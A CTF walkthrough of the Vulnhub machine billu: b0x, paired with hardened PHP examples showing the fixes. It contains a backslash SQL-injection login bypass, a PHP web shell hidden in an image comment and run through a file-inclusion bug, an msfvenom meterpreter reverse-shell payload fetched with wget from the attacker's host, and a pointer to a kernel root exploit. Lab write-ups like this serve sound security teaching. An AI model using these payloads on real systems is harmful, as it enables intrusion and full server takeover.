Welcome Everyone.

Today we are solving the billu: b0x CTF. I found the name interesting so why not?
Vulnhub link: https://www.vulnhub.com/entry/billu-b0x,188/

Let’s get started.

First and foremost we have to discover the IP of the machine. We run the command: nmap -sT 192.168.56.0/24
We can see the results in the following picture.

The obvious next step: we type 192.168.56.107 into the browser to check what page the HTTP server serves (if any).
OK, I typed the address and this is what I found:

This was my first reaction:

After half an hour of failed attempts I got bored and thought that the SQLi might be somewhere else, or that it was just a trick by the creator to troll us.

I fired up nikto and found some interesting things. test.php was the first file I checked in my browser: it says the file parameter does not exist. Interesting.

I tried the obvious thing: http://192.168.56.107/test.php?file=asddsa, but it did not work. It took me 5 minutes to understand the trick: it was the request type. I was sending a GET request but it required a POST request to work. I opened Burp (actually it was already open) and tried it.

We have the following results:

Now we have to explore the system for a piece of information that will give us access to the machine.

I checked index.php, which was the only file I was sure actually existed, and I found some interesting lines of code:

if(isset($_POST['login']))
{
    // Only the single quote is removed; backslashes pass through untouched.
    $uname=str_replace('\'','',urldecode($_POST['un']));
    $pass=str_replace('\'','',urldecode($_POST['ps']));
    // The values are concatenated straight into the query text.
    $run='select * from auth where  pass=\''.$pass.'\' and uname=\''.$uname.'\'';
    $result = mysqli_query($conn, $run);
    if (mysqli_num_rows($result) > 0) {
        $row = mysqli_fetch_assoc($result);
        echo "You are allowed<br>";
        $_SESSION['logged']=true;
        $_SESSION['admin']=$row['username'];
        header('Location: panel.php', true, 302);
    }
    else
    {
        echo "<script>alert('Try again');</script>";
    }
}

These are the lines that actually matter:

$uname=str_replace('\'','',urldecode($_POST['un']));
$pass=str_replace('\'','',urldecode($_POST['ps']));
$run='select * from auth where  pass=\''.$pass.'\' and uname=\''.$uname.'\'';

It strips only one specific character: the single quote ('). So the plan is to break the quoting from the inside: if we put a backslash at the end of the value we type into the password field, the quote that the code appends after it will not close, and we get the following result:

select * from auth where  pass='test\' and uname=' or 1=1-- '

The part pass='test\' and uname=' is inside quotes: because \' is an escaped quote for MySQL, the server sees that whole stretch as one string literal, and what follows it (or 1=1--) is executed as SQL.
So we need to send our payload.

pass: test\
username: or 1=1--
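Why removing the quote character does not help, and what fixes it. This is an added example, not code from the box: the filter from index.php reproduced as a function, next to a prepared-statement version of the same lookup. It assumes $conn is an open mysqli connection, as in the original file.

```php
<?php
// Added example (not the box's code): the filter from index.php next to a
// prepared-statement version. $conn is assumed to be an open mysqli handle.

// Vulnerable: identical logic to index.php. Only the quote character is
// removed, so a value ending in a backslash escapes the closing quote that
// the code appends after it.
function build_query_vulnerable(string $un, string $ps): string
{
    $uname = str_replace('\'', '', urldecode($un));
    $pass  = str_replace('\'', '', urldecode($ps));
    return 'select * from auth where  pass=\'' . $pass . '\' and uname=\'' . $uname . '\'';
}

// Safe: the values are bound as parameters and never become part of the SQL
// text, so neither quotes nor backslashes in them can change the statement.
function login_safe(mysqli $conn, string $un, string $ps): ?array
{
    $stmt = $conn->prepare('select * from auth where pass = ? and uname = ?');
    $stmt->bind_param('ss', $ps, $un);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // get_result() needs mysqlnd
    $stmt->close();
    return $row ?: null;
}

// The walkthrough's input, reproduced for illustration: the query text now
// contains pass='test\' and uname=' or 1=1-- '. MySQL treats \' as an escaped
// quote, so pass='test\' and uname=' is a single string literal and the
// "or 1=1-- " after it runs as SQL. login_safe() never builds such text.
echo build_query_vulnerable(' or 1=1-- ', 'test\\'), PHP_EOL;
```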

It works.

We can see from the following picture that we gained access to the website panel.

We have the following options: 1) we can see the existing users; 2) we can create a user.

Since we can create a user and upload an image, we will try to upload a shell via the image upload.

We need a shell to upload. We are going to generate one with weevely. Wrong... for some reason the tool broke and I am not going to fix it now, so we are going to create our own simple shell.

I created a file named shell.php with the following code in it:

<?php
echo system($_GET["c"]);
?>

Simple. Now we try uploading it... FAIL!!! 😛

What if we inject the shell code into a jpg file and then display the jpg via the LFI vulnerability? Would our code be executed? Let's find out.

I injected the shell code into the image using GIMP and uploaded it successfully to the server. Unfortunately, when I tried to run the PHP code, it did not execute. I need to find another way.
We can see in the following pictures how I injected the shell code as a comment and how it failed to execute.

Notice: You can inject code or other data into an image by putting it in a comment. Comments exist in image formats so authors can keep some short info about their creations. GIMP is a simple tool that lets you add comments to an image.


Hmm... Let's examine the code of panel.php before we continue with exploitation. We may find something useful. Yep, I was right.

Look at that piece of code: (panel.php)

if(isset($_POST['continue']))
{
    $dir=getcwd();
    // Only the literal "./" is stripped; anything else in load is kept.
    $choice=str_replace('./','',$_POST['load']);

    if($choice==='add')
    {
        include($dir.'/'.$choice.'.php');
        die();
    }

    if($choice==='show')
    {
        include($dir.'/'.$choice.'.php');
        die();
    }
    else
    {
        // Raw user input goes into the include path.
        include($dir.'/'.$_POST['load']);
    }
}

The last else branch is the one that could damage the system. It gives us RCE because of the include: our code is sitting inside the uploaded image, and now we are going to get it executed. I did it via Burp Suite because a POST request is required.
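A hardened version of that panel.php branch, added here as an example rather than the box's own code: the load value is only ever used as a key into a fixed map, so the request can choose a page but never supplies a path, and a PHP payload hidden in an image comment stays inert because nothing ever include()s the image.

```php
<?php
// Added example (not the box's code): replaces panel.php's
// include($dir.'/'.$_POST['load']) with an allow-list lookup.
// The page names are assumed; on the box only add.php and show.php exist.
const PANEL_PAGES = [
    'add'  => 'add.php',
    'show' => 'show.php',
];

// Returns the absolute path to include, or null if the choice is not allowed.
// User input is compared against keys only and never spliced into the path.
function resolve_panel_page(string $load, string $dir): ?string
{
    if (!array_key_exists($load, PANEL_PAGES)) {
        return null;
    }
    return $dir . '/' . PANEL_PAGES[$load];
}

if (isset($_POST['continue'])) {
    $page = resolve_panel_page((string)($_POST['load'] ?? ''), getcwd());
    if ($page === null) {
        // Reject anything outside the map instead of falling through to a
        // catch-all include, which is what made the original branch dangerous.
        http_response_code(400);
        exit('Unknown page');
    }
    include $page;
    die();
}
```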

My computer restarted almost without reason... anyway, let's continue the walkthrough. For some reason I could only see the image jack.jpg with the previous exploit, so I downloaded that specific image, injected the code into it and re-uploaded it to the server (I do not know why I could not see the other images). One thing I noticed: system, exec, shell_exec and some other functions are disabled; the only one that worked for me was passthru.
I changed the injected code to: <?php passthru($_GET["c"]); ?> and everything worked fine.

Now that we can execute commands on the server, we can create a quick payload, download it to the server and execute it there. My money is on meterpreter 😛

I generated the payload with the following command: msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf lhost=192.168.1.18 lport=4444 -a x86 --platform linux -o /var/www/html/payload

I started Apache and then exploit/multi/handler in Metasploit.

I use the /tmp path to download the payload to the server because it is more likely to be a writable folder, and the following command (sent through the c parameter, so the + signs are URL-encoded spaces) to download the payload to the server:
wget+-O/tmp/payload+http://192.168.1.18/payload

Notice: I forgot to change my eth0 IP to 192.168.56.x so it would be on the same (host-only) network as the VirtualBox machine, which led me to spend half an hour looking for why I was getting a host unreachable message when using wget. The only thing I did to make it work was: sudo ifconfig eth0 192.168.56.5 up, and then run the previous command again to download the file, with the correct IP of course (wget+-O/tmp/payload+http://192.168.56.5/payload). Oh, almost forgot: I also re-generated the payload with the correct IP (192.168.56.5) and set the lhost of multi/handler to 192.168.56.5. That is, I changed my local IP to 192.168.56.5 so the VirtualBox machine could talk back to me 🙂

The only thing left now is to execute the payload 🙂
I gave it rwx permissions with the command:
chmod+u=rwx+/tmp/payload
and executed it with the command: /tmp/payload
Now we have a meterpreter session on the system 🙂

We are in, but we need to get r00t.

By typing sysinfo in meterpreter we can see that it is running Ubuntu 12.04, pretty old. I searched Google for a privilege escalation exploit and found this one:
https://www.exploit-db.com/exploits/37292/
I downloaded the exploit, compiled it, and here we are: root 😛

Thanks everyone, I hope you had a good time 😛